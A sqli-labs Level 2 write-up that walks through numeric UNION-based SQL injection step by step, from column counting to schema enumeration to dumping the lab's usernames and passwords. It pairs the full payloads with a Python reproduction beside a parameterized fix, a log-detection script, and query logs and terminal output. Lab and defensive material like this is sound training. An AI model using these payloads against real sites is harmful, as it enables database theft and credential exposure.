sqli-labs Level 2

First submit a single quote ' as the id. The page returns a MySQL error, so the parameter is injectable. Look at the quoting in the error text: it contains three quote marks in total, the two MySQL uses to delimit the offending fragment plus the one we injected, with nothing in front of ours. That means the application does not wrap id in quotes of its own, so the value is being used as an integer. A second check is to submit arithmetic such as 2-1 or 6-2: if ?id=2-1 comes back with the same row as ?id=1, the parameter is evaluated as a number. Both checks agree, so this is a numeric (integer) injection.

http://10.9.0.4/Less-2/?id=1 and 1=1

No error is returned. With a numeric injection there is no string to close, so no single quote is needed in the payload. Next determine the column count with order by 1, 2, 3, 4 in turn: order by 4 throws an error, so the query selects 3 columns.

http://10.9.0.4/Less-2/?id=1 order by 4

Now test which positions are echoed. With id=-1 the original WHERE clause matches nothing, so the row supplied by the UNION is displayed: positions 2 and 3 appear on the page.

http://10.9.0.4/Less-2/?id=-1 union select 1,2,3

Next, dump the name of the current database:

http://10.9.0.4/Less-2/?id=-1 union select 1,database(),3

List the databases on the server:

http://10.9.0.4/Less-2/?id=-1 union select null,null,(select group_concat(schema_name) from information_schema.schemata)

Next, enumerate the tables in the security database:

http://10.9.0.4/Less-2/?id=-1 union select null,null,(select group_concat(table_name) from information_schema.tables where table_schema='security')

Enumerate the columns of the users table. This filters on table_name alone; if another database on the server also has a users table, its columns would be mixed in, so adding and table_schema='security' to the WHERE clause is the safer form:

http://10.9.0.4/Less-2/?id=-1 union select null,null,(select group_concat(column_name) from information_schema.columns where table_name='users')

Finally dump the username and password fields. 0x3a is a hex literal for the ASCII code of ':', which MySQL treats as the string ':'; using it as the separator keeps quote characters out of the payload:

http://10.9.0.4/Less-2/?id=-1 union select null,null,group_concat(id,0x3a,username,0x3a,password) from security.users
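The whole procedure above, from the numeric-type checks through the final dump, reproduced as an added Python example; it is not part of the original write-up. SQLite stands in for MySQL (an assumption; the lab's database is MySQL), and the rows are the sqli-labs security.users data dumped later on this page. vulnerable_lookup builds the statement by string concatenation the way Less-2 does; safe_lookup binds the value as a parameter and accepts only an integer literal. Because SQLite reads 0x3a as the integer 58 rather than the string ':', the final payload concatenates a quoted ':' instead.

```python
"""Added example: Less-2's concatenated query beside a parameterized one,
exercised with the payloads from this page against an in-memory SQLite copy
of the users table. SQLite stands in for MySQL here (an assumption)."""
import sqlite3

# The sqli-labs security.users rows (same data as the dump on this page).
USERS = [
    (1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword"),
    (4, "secure", "crappy"), (5, "stupid", "stupidity"), (6, "superman", "genious"),
    (7, "batman", "mob!le"), (8, "admin", "admin"), (9, "admin1", "admin1"),
    (10, "admin2", "admin2"), (11, "admin3", "admin3"), (12, "dhakkan", "dumbo"),
    (14, "admin4", "admin4"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def vulnerable_lookup(conn, user_id):
    """Mirrors Less-2: id is pasted into the statement unquoted, so anything
    after the digits is parsed as SQL, not compared as a value."""
    sql = f"SELECT * FROM users WHERE id={user_id} LIMIT 0,1"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, user_id):
    """Hardened form: accept only an integer literal, then bind it. Binding
    alone already defeats the payloads; the int() check refuses them early."""
    uid = int(str(user_id).strip())  # ValueError for "1'", "2-1", "-1 union ..."
    return conn.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (uid,)).fetchall()


def rejected(conn, value):
    """True when safe_lookup refuses the value instead of querying with it."""
    try:
        safe_lookup(conn, value)
    except ValueError:
        return True
    return False


def probe_numeric(conn):
    """The two type checks from the write-up: a stray quote breaks the
    statement, and arithmetic in the parameter is evaluated (2-1 -> id 1)."""
    try:
        vulnerable_lookup(conn, "1'")
        quote_breaks = False
    except sqlite3.OperationalError:
        quote_breaks = True
    arithmetic_evaluated = vulnerable_lookup(conn, "2-1") == vulnerable_lookup(conn, 1)
    return quote_breaks, arithmetic_evaluated


def column_count(conn, max_cols=8):
    """ORDER BY n fails once n exceeds the column count; the last good n is it."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_lookup(conn, f"1 order by {n}")
        except sqlite3.OperationalError:
            return n - 1
    return None


def echo_positions(conn):
    """id=-1 matches nothing, so the UNION row is what comes back."""
    return vulnerable_lookup(conn, "-1 union select 1,2,3")


def dump_users(conn):
    """The final payload. SQLite reads 0x3a as the integer 58, not ':',
    so the separator is a quoted literal here; MySQL accepts 0x3a as shown above."""
    payload = ("-1 union select null,null,"
               "group_concat(id||':'||username||':'||password) from users")
    return vulnerable_lookup(conn, payload)[0][2]


if __name__ == "__main__":
    db = make_db()
    print("quote breaks / arithmetic evaluated:", probe_numeric(db))
    print("columns:", column_count(db))
    print("union row:", echo_positions(db))
    print("dump:", dump_users(db))
    print("safe_lookup(1):", safe_lookup(db, 1))
    print("safe_lookup rejects payload:", rejected(db, "-1 union select 1,2,3"))
```

The point of the two lookups side by side: the parameterized statement never parses the input as SQL, so the same string that walks the schema through vulnerable_lookup is simply a value that no id equals. The int() check on top is defence in depth, and it also gives the application a clean place to log and reject probes like 1' or 2-1 before they reach the database.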

The MySQL general query log entries for the injected requests:
210219 11:27:49	  250 Connect	[email protected] on 
		  250 Init DB	security
		  250 Query	SELECT * FROM users WHERE id=1 order by 4 LIMIT 0,1
		  250 Quit	
210219 11:28:09	  251 Connect	[email protected] on 
		  251 Init DB	security
		  251 Query	SELECT * FROM users WHERE id=-1 union select 1,2,3 LIMIT 0,1
		  251 Quit	
210219 11:28:23	  252 Connect	[email protected] on 
		  252 Init DB	security
		  252 Query	SELECT * FROM users WHERE id=-1 union select 1,database(),3 LIMIT 0,1
		  252 Quit	
210219 11:28:33	  253 Connect	[email protected] on 
		  253 Init DB	security
		  253 Query	SELECT * FROM users WHERE id=-1 union select null,null,(select group_concat(schema_name) from information_schema.schemata) LIMIT 0,1
		  253 Quit	
210219 11:28:43	  254 Connect	[email protected] on 
		  254 Init DB	security
		  254 Query	SELECT * FROM users WHERE id=-1 union select null,null,(select group_concat(table_name) from information_schema.tables where table_schema='security') LIMIT 0,1
		  254 Quit	
210219 11:28:51	  255 Connect	[email protected] on 
		  255 Init DB	security
		  255 Query	SELECT * FROM users WHERE id=-1 union select null,null,(select group_concat(column_name) from information_schema.columns where table_name='users') LIMIT 0,1
		  255 Quit	
210219 11:29:01	  256 Connect	[email protected] on 
		  256 Init DB	security
		  256 Query	SELECT * FROM users WHERE id=-1 union select null,null,group_concat(id,0x3a,username,0x3a,password) from security.users LIMIT 0,1
		  256 Quit	
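Detection logic run over log lines in this layout, as an added example that is not part of the original post. The sample lines are constructed here to mirror the entries above (the timestamps, connection ids, the app@10.9.0.2 account and the benign first request are made up). The parser handles the general log's timestamp-then-continuation format, and each Query line is matched against a handful of signals that the payloads on this page trip: UNION SELECT, information_schema access, ORDER BY with a bare integer, a negative id, GROUP_CONCAT, and AND/OR tautologies.

```python
"""Added example: flag SQL-injection probes in MySQL general-log text."""
import re
from collections import Counter

# Constructed sample in general-log layout, modelled on the entries above.
# Timestamps, connection ids, the app@10.9.0.2 account and the benign first
# request are made up for this example.
SAMPLE_LOG = """\
210219 11:27:30\t  249 Connect\tapp@10.9.0.2 on 
\t\t  249 Init DB\tsecurity
\t\t  249 Query\tSELECT * FROM users WHERE id=1 LIMIT 0,1
\t\t  249 Quit\t
210219 11:27:49\t  250 Connect\tapp@10.9.0.2 on 
\t\t  250 Init DB\tsecurity
\t\t  250 Query\tSELECT * FROM users WHERE id=1 order by 4 LIMIT 0,1
\t\t  250 Quit\t
210219 11:28:09\t  251 Connect\tapp@10.9.0.2 on 
\t\t  251 Init DB\tsecurity
\t\t  251 Query\tSELECT * FROM users WHERE id=-1 union select 1,2,3 LIMIT 0,1
\t\t  251 Quit\t
210219 11:28:43\t  254 Connect\tapp@10.9.0.2 on 
\t\t  254 Init DB\tsecurity
\t\t  254 Query\tSELECT * FROM users WHERE id=-1 union select null,null,(select group_concat(table_name) from information_schema.tables where table_schema='security') LIMIT 0,1
\t\t  254 Quit\t
"""

# One general-log record: optional "YYMMDD HH:MM:SS", connection id, command, argument.
# Continuation lines within the same second carry tabs instead of a timestamp.
LINE_RE = re.compile(r"^(\d{6} \d\d:\d\d:\d\d)?\t\s*(\d+) (Connect|Init DB|Query|Quit)\t?(.*)$")

# Signals that the payloads on this page trip. Each one alone is weak; several
# on one statement, or several statements from one source, is the real signal.
SIGNALS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\b", re.I),
    "negative_id": re.compile(r"\bid\s*=\s*-\d+\b", re.I),
    "concat_dump": re.compile(r"\bgroup_concat\s*\(", re.I),
    "tautology": re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*\1\b", re.I),
}


def parse_general_log(text):
    """Yield (timestamp, connection_id, command, argument) per record,
    carrying the last timestamp forward onto continuation lines."""
    last_ts = None
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, cid, cmd, arg = m.groups()
        if ts:
            last_ts = ts
        yield last_ts, int(cid), cmd, arg


def classify_query(sql):
    """Names of the signals matched by one SQL statement, sorted."""
    return sorted(name for name, rx in SIGNALS.items() if rx.search(sql))


def find_injection(text):
    """Map connection id -> details for every Query that trips a signal.
    The Connect record supplies the user@host to attribute the query to."""
    sources, hits = {}, {}
    for ts, cid, cmd, arg in parse_general_log(text):
        if cmd == "Connect":
            sources[cid] = arg.split(" on")[0]
        elif cmd == "Query":
            signals = classify_query(arg)
            if signals:
                hits[cid] = {"time": ts, "source": sources.get(cid),
                             "sql": arg, "signals": signals}
    return hits


def flagged_sources(hits):
    """Count flagged connections per user@host: one account issuing an ORDER BY
    probe, then a UNION marker, then a schema walk in sequence is the pattern."""
    return Counter(h["source"] for h in hits.values())


if __name__ == "__main__":
    found = find_injection(SAMPLE_LOG)
    for cid, h in sorted(found.items()):
        print(f"{h['time']} conn={cid} {h['source']}: {', '.join(h['signals'])}")
        print(f"    {h['sql']}")
    print(flagged_sources(found))
```

Run on the sample, the benign id=1 request on connection 249 produces no hit, while 250, 251 and 254 are flagged with an escalating set of signals from the same account, which is exactly the shape of the walk-through above. In a real deployment the general log is expensive and usually off; the same matching applies to the application's own query log or to a proxy that sees the statements.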
The same injected statements run directly in the mysql terminal:
mysql> SELECT * FROM users WHERE id=1 order by 3 LIMIT 0,1 ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> SELECT * FROM users WHERE id=1 order by 4 LIMIT 0,1 ;
ERROR 1054 (42S22): Unknown column '4' in 'order clause'
mysql> SELECT * FROM users WHERE id=-1 union select 1,2,3 LIMIT 0,1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | 2        | 3        |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> SELECT * FROM users WHERE id=-1 union select 1,database(),3 LIMIT 0,1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | security | 3        |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> SELECT * FROM users WHERE id=-1 union select null,null,(select group_concat(schema_name) from information_schema.schemata) LIMIT 0,1;
+------+----------+-----------------------------------------------------------------+
| id   | username | password                                                        |
+------+----------+-----------------------------------------------------------------+
| NULL | NULL     | information_schema,challenges,mysql,performance_schema,security |
+------+----------+-----------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> SELECT * FROM users WHERE id=-1 union select null,null,(select group_concat(table_name) from information_schema.tables where table_schema='security') LIMIT 0,1;
+------+----------+-------------------------------+
| id   | username | password                      |
+------+----------+-------------------------------+
| NULL | NULL     | emails,referers,uagents,users |
+------+----------+-------------------------------+
1 row in set (0.00 sec)

mysql> SELECT * FROM users WHERE id=-1 union select null,null,(select group_concat(column_name) from information_schema.columns where table_name='users') LIMIT 0,1;
+------+----------+----------------------+
| id   | username | password             |
+------+----------+----------------------+
| NULL | NULL     | id,username,password |
+------+----------+----------------------+
1 row in set (0.00 sec)

mysql> SELECT * FROM users WHERE id=-1 union select null,null,group_concat(id,0x3a,username,0x3a,password) from security.users LIMIT 0,1;
+------+----------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id   | username | password                                                                                                                                                                                                                  |
+------+----------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| NULL | NULL     | 1:Dumb:Dumb,2:Angelina:I-kill-you,3:Dummy:p@ssword,4:secure:crappy,5:stupid:stupidity,6:superman:genious,7:batman:mob!le,8:admin:admin,9:admin1:admin1,10:admin2:admin2,11:admin3:admin3,12:dhakkan:dumbo,14:admin4:admin4 |
+------+----------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> 

That's about it.
